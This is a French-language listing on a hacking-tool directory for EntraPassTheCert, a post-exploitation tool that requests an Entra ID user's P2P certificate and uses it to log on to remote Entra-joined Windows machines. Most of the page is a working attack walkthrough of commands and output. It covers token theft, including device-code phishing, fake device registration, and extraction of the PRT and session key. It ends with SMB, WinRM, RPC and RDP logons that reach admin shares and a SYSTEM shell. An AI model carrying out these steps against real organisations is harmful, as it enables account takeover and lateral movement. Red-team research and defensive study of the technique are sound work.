Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
EntraPassTheCert — outil pour demander le certificat P2P d'Entra ID et s'authentifier auprès d'appareils distants joints à Entra ID avec celui-ci | Kitploit
Outils/GitHubGitHub/temp43487580/entrapassthecert
Mouvement LatéralPost-ExploitationTests d'IntrusionSécurité CloudGestion des Identités et des Accès (IAM)AuthentificationRed Teaming
GitHubtemp43487580/entrapassthecert

EntraPassTheCert

outil pour demander le certificat P2P d'Entra ID et s'authentifier auprès d'appareils distants joints à Entra ID avec celui-ci

Voir le dépôt
13516il y a 0 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

EntraPassTheCert

EntraPassTheCert est un outil de post-exploitation qui permet à un attaquant de demander le certificat P2P de l'utilisateur d'Entra ID et de s'authentifier avec celui-ci sur une machine distante jointe à Entra.

root@kitploit:~
$ python3 entraptc.py -h

usage: entraptc.py [-h] [--debug] {request_p2pcert,smb,rdp,winrm,rpc} ...

post-exploitation tool for requesting p2p cert and authenticate with it

positional arguments:
  {request_p2pcert,smb,rdp,winrm,rpc}
                        Available commands
    request_p2pcert     request P2P cert with PRT and SessionKey
    smb                 SMB to Entra joinned machine with P2P cert
    rdp                 RDP to Entra joinned machine with P2P cert
    winrm               WinRM to Entra joinned machine with P2P cert
    rpc                 RPC to Entra joinned machine with P2P cert

options:
  -h, --help            show this help message and exit
  --debug               debug option

Le code est basé sur les excellents outils existants.

  • impacket
  • ROADTools
  • AADInternals
  • pywinrm
  • aardwolf

Cet outil est présenté à Troopers 2025 :

Hopping Accross Devices: Expanding Lateral Movement through Pass-the-Certificate Attack

Utilisation

Demander un certificat P2P

Tout d'abord, obtenez les jetons Microsoft Entra requis avec les identifiants de n'importe quel compte disposant d'un accès administrateur local à un appareil cible.

root@kitploit:~
$ roadtx gettokens -r devicereg -c 29d9ed98-a469-4536-ade2-f981bc1d605e -u globaladmin@***.onmicrosoft.com -p $PASSWORD
Requesting token for resource urn:ms-drs:enterpriseregistration.windows.net
Tokens were written to .roadtools_auth

Si vous n'avez pas les identifiants, vous pouvez également exécuter une attaque par hameçonnage via le flux device-code pour obtenir les jetons.

root@kitploit:~
$ roadtx gettokens --device-code -r devicereg -c 29d9ed98-a469-4536-ade2-f981bc1d605e
Requesting token for resource urn:ms-drs:enterpriseregistration.windows.net
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code HGCUCJ6CS to authenticate.
Tokens were written to .roadtools_auth

Ensuite, enregistrez un faux appareil auprès d'Entra ID.

root@kitploit:~
$ roadtx device -a join -n fake_device
Saving private key to fake_device.key
Registering device
Device ID: 0d9d2d66-7343-4bf2-a3dd-377c9e1e6244
Saved device certificate to fake_device.pem

Ensuite, à l'aide de l'appareil enregistré, demandez le PRT et la clé de session.

root@kitploit:~
$ REFRESHTOKEN=(`cat .roadtools_auth | jq -r .refreshToken`) 

$ roadtx prt -c fake_device.pem -k fake_device.key -r $REFRESHTOKEN
Obtained PRT: 1.AT0A7mRQZ....
Obtained session key: fabd04bf017c526fd...
Saved PRT to roadtx.prt

Une fois que vous avez reçu le PRT et la clé de session, vous pouvez demander le certificat P2P de l'utilisateur.

root@kitploit:~
$ PRT=(`cat roadtx.prt | jq -r .refresh_token`)

$ SESSIONKEY=(`cat roadtx.prt | jq -r .session_key`)

$ python3 entraptc.py request_p2pcert --prt $PRT --sessionkey $SESSIONKEY
[*] requesting P2P cert...
[+] successfully acquired P2P cert!
[*] here is your p2p cert pfx : p2pcert.pfx (pw: password)

Passer le certificat P2P

Vous pouvez vous authentifier sur une machine jointe à Entra en utilisant le certificat P2P comme suit.

  • SMB
root@kitploit:~
$ python3 entraptc.py smb --target 192.168.153.133 --pfx p2pcert.pfx      
[*] connecting to 192.168.153.133 via SMB...
[+] sucessfully logged-on to the system!
Type help for list of commands
# shares
ADMIN$
C$
IPC$
# use C$
# ls
drw-rw-rw-          0  Fri May 30 15:52:50 2025 $Recycle.Bin
drw-rw-rw-          0  Sat Apr 19 01:54:46 2025 Documents and Settings
-rw-rw-rw-      12288  Sun Jun 15 10:45:59 2025 DumpStack.log.tmp
drw-rw-rw-          0  Fri May 30 09:06:09 2025 inetpub
-rw-rw-rw-  738197504  Sun Jun 15 10:45:58 2025 pagefile.sys
drw-rw-rw-          0  Sat Apr 19 02:49:28 2025 PerfLogs
drw-rw-rw-          0  Tue Jun 10 14:58:44 2025 Program Files
drw-rw-rw-          0  Tue May 27 15:59:56 2025 Program Files (x86)
drw-rw-rw-          0  Tue Jun 10 14:54:46 2025 ProgramData
drw-rw-rw-          0  Sat Apr 19 01:53:41 2025 Recovery
-rw-rw-rw-   16777216  Sun Jun 15 10:45:59 2025 swapfile.sys
drw-rw-rw-          0  Fri May 30 09:39:44 2025 System Volume Information
drw-rw-rw-          0  Fri May 30 15:52:23 2025 Users
drw-rw-rw-          0  Wed Jun 11 09:30:27 2025 Windows
  • WinRM
root@kitploit:~
$ python3 entraptc.py winrm --target 192.168.153.133 --pfx p2pcert.pfx
[*] connecting to 192.168.153.133 via WinRM...
[+] sucessfully logged-on to the system!

C:\Users\admin> whoami
azuread\admin
  • RPC
root@kitploit:~
$ python3 entraptc.py rpc --target 192.168.153.133 --pfx p2pcert.pfx                                                                   

[*] connecting to 192.168.153.133 via RPC...
[+] sucessfully logged-on to the system!

C:\Windows\System32>whoami
nt authority\system
  • RDP
    • Vous devez spécifier les identifiants du compte
root@kitploit:~
$ python3 entraptc.py rdp --username globaladmin@***.onmicrosoft.com --password $PASSWORD --target 192.168.153.133 --pfx p2pcert.pfx

Remarques

  • La machine cible doit être une machine jointe à Entra, pas une machine jointe à Entra hybride ni une machine enregistrée auprès d'Entra.
  • Testé sur des machines Windows 11/10, mais pas sur Windows Server.

Avertissement

Ce projet est fourni uniquement à des fins éducatives et de recherche.
Il est destiné à aider les professionnels de la sécurité, les chercheurs et les étudiants à comprendre les vecteurs d'attaque potentiels et à améliorer les mesures défensives.

Référence

https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597

Télécharger l’outil